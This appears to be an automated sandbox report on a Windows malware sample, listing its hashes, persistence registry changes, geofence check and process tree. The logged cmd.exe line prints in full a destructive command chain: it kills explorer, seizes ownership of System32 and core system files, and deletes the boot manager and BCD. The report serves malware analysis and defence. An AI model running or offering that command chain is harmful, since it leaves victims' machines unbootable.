Analysis
max time kernel: 132s
max time network: 136s
platform: windows10-2004_x64
resource: win10v2004-en-20220113
submitted: 27-03-2022 03:14
Static task: static1
Behavioral task: behavioral1
  Sample: 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
  Resource: win7-20220311-en
Behavioral task: behavioral2
  Sample: 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
  Resource: win10v2004-en-20220113
General
Target: 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
Size: 167KB
MD5: e2dd51185d89bf02160ca232d2c9be77
SHA1: d562fc86c73c154030b7f7021ecc10c89312cc22
SHA256: 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d
SHA512: 6d2e3cfdecbd7cbce5258b312405ad53f6e0e4a0b2a2f1e98795063cf0718203494125d663e411742c0033a6e1cb580843a1ff1475e25ea82bd09a2a70deb340
Malware Config
Signatures
Modifies WinLogon for persistence (2 TTPs, 1 IoC)
Processes: 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" | 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

Disables RegEdit via registry modification

Disables Task Manager via registry modification

Possible privilege escalation attempt (8 IoCs)
Processes: icacls.exe, takeown.exe, icacls.exe, takeown.exe, icacls.exe, takeown.exe, icacls.exe, takeown.exe
  pid | process
  376 | icacls.exe
  3916 | takeown.exe
  720 | icacls.exe
  2540 | takeown.exe
  4632 | icacls.exe
  3804 | takeown.exe
  1672 | icacls.exe
  460 | takeown.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Processes: 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

Modifies file permissions (1 TTP, 8 IoCs)
Processes: takeown.exe, icacls.exe, takeown.exe, icacls.exe, takeown.exe, icacls.exe, takeown.exe, icacls.exe
  pid | process
  3916 | takeown.exe
  720 | icacls.exe
  2540 | takeown.exe
  4632 | icacls.exe
  3804 | takeown.exe
  1672 | icacls.exe
  460 | takeown.exe
  376 | icacls.exe

Adds Run key to start application (2 TTPs, 1 IoC)
Processes: 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black_Mamba = "C:\\Users\\Admin\\AppData\\Local\\Temp\\62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe" | 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

Modifies WinLogon (2 TTPs, 1 IoC)
Processes: 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" | 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Kills process with taskkill (2 IoCs)
Processes: taskkill.exe, taskkill.exe
  pid | process
  3304 | taskkill.exe
  4844 | taskkill.exe

Suspicious use of AdjustPrivilegeToken (8 IoCs)
Processes: 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe, taskkill.exe, takeown.exe, takeown.exe, takeown.exe, takeown.exe, taskkill.exe
  description | pid | process
  Token: SeDebugPrivilege | 1228 | 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
  Token: SeDebugPrivilege | 1228 | 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
  Token: SeDebugPrivilege | 3304 | taskkill.exe
  Token: SeTakeOwnershipPrivilege | 460 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 3916 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 2540 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 3804 | takeown.exe
  Token: SeDebugPrivilege | 4844 | taskkill.exe

Suspicious use of WriteProcessMemory (22 IoCs)
Processes: 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe, cmd.exe
  description | pid | process | target process
  PID 1228 wrote to memory of 2520 | 1228 | 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe | cmd.exe
  PID 1228 wrote to memory of 2520 | 1228 | 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe | cmd.exe
  PID 2520 wrote to memory of 3304 | 2520 | cmd.exe | taskkill.exe
  PID 2520 wrote to memory of 3304 | 2520 | cmd.exe | taskkill.exe
  PID 2520 wrote to memory of 460 | 2520 | cmd.exe | takeown.exe
  PID 2520 wrote to memory of 460 | 2520 | cmd.exe | takeown.exe
  PID 2520 wrote to memory of 376 | 2520 | cmd.exe | icacls.exe
  PID 2520 wrote to memory of 376 | 2520 | cmd.exe | icacls.exe
  PID 2520 wrote to memory of 3916 | 2520 | cmd.exe | takeown.exe
  PID 2520 wrote to memory of 3916 | 2520 | cmd.exe | takeown.exe
  PID 2520 wrote to memory of 720 | 2520 | cmd.exe | icacls.exe
  PID 2520 wrote to memory of 720 | 2520 | cmd.exe | icacls.exe
  PID 2520 wrote to memory of 2540 | 2520 | cmd.exe | takeown.exe
  PID 2520 wrote to memory of 2540 | 2520 | cmd.exe | takeown.exe
  PID 2520 wrote to memory of 4632 | 2520 | cmd.exe | icacls.exe
  PID 2520 wrote to memory of 4632 | 2520 | cmd.exe | icacls.exe
  PID 2520 wrote to memory of 3804 | 2520 | cmd.exe | takeown.exe
  PID 2520 wrote to memory of 3804 | 2520 | cmd.exe | takeown.exe
  PID 2520 wrote to memory of 1672 | 2520 | cmd.exe | icacls.exe
  PID 2520 wrote to memory of 1672 | 2520 | cmd.exe | icacls.exe
  PID 2520 wrote to memory of 4844 | 2520 | cmd.exe | taskkill.exe
  PID 2520 wrote to memory of 4844 | 2520 | cmd.exe | taskkill.exe

System policy modification (1 TTP, 2 IoCs)
Processes: 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "1" | 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUA = "1" | 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
Processes

C:\Users\Admin\AppData\Local\Temp\62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe (depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe"
  - Modifies WinLogon for persistence
  - Checks computer location settings
  - Adds Run key to start application
  - Modifies WinLogon
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification

  C:\Windows\System32\cmd.exe (depth 2)
    command line: "C:\Windows\System32\cmd.exe" /k color 47 && taskkill /f /im explorer.exe && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant %username%:F && takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant %username%:F && taskkill /f /im taskhost.exe && takeown /f C:\Windows\System32\user32.dll && icacls C:\Windows\System32\user32.dll /grant %username%:F && takeown /f C:\Windows\System32\kernel32.dll && icacls C:\Windows\System32\kernel32.dll /grant %username%:F && takeown /f C:\Windows\explorer.exe && icacls C:\Windows\explorer.exe /grant %username%:F && takeown /f C:\Windows\Boot\PCAT\bootmgr && icacls C:\Windows\Boot\PCAT\bootmgr /grant %username%:F && del C:\Windows\Boot\PCAT\bootmgr && takeown /f C:\Windows\Boot\DVD\PCAT\BCD && icacls C:\Windows\Boot\DVD\PCAT\BCD /grant %username%:F && del C:\Windows\Boot\DVD\PCAT\BCD && takeown /f C:\Windows\explorer.exe && icacls C:\Windows\explorer.exe /grant %username%:F && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && Exit
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\taskkill.exe (depth 3)
      command line: taskkill /f /im explorer.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\takeown.exe (depth 3)
      command line: takeown /f C:\Windows\System32
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe (depth 3)
      command line: icacls C:\Windows\System32 /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\takeown.exe (depth 3)
      command line: takeown /f C:\Windows\System32\drivers
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe (depth 3)
      command line: icacls C:\Windows\System32\drivers /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\takeown.exe (depth 3)
      command line: takeown /f C:\Windows\System32\winload.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe (depth 3)
      command line: icacls C:\Windows\System32\winload.exe /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\takeown.exe (depth 3)
      command line: takeown /f C:\Windows\System32\winlogon.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe (depth 3)
      command line: icacls C:\Windows\System32\winlogon.exe /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\taskkill.exe (depth 3)
      command line: taskkill /f /im taskhost.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
Network
Downloads
memory/376-137-0x0000000000000000-mapping.dmp
memory/460-136-0x0000000000000000-mapping.dmp
memory/720-139-0x0000000000000000-mapping.dmp
memory/1228-133-0x000000001BA22000-0x000000001BA24000-memory.dmp (Filesize 8KB)
memory/1228-132-0x000000001BA20000-0x000000001BA22000-memory.dmp (Filesize 8KB)
memory/1228-131-0x00007FFE82B80000-0x00007FFE83641000-memory.dmp (Filesize 10.8MB)
memory/1228-130-0x0000000000D10000-0x0000000000D40000-memory.dmp (Filesize 192KB)
memory/1672-143-0x0000000000000000-mapping.dmp
memory/2520-134-0x0000000000000000-mapping.dmp
memory/2540-140-0x0000000000000000-mapping.dmp
memory/3304-135-0x0000000000000000-mapping.dmp
memory/3804-142-0x0000000000000000-mapping.dmp
memory/3916-138-0x0000000000000000-mapping.dmp
memory/4632-141-0x0000000000000000-mapping.dmp
memory/4844-144-0x0000000000000000-mapping.dmp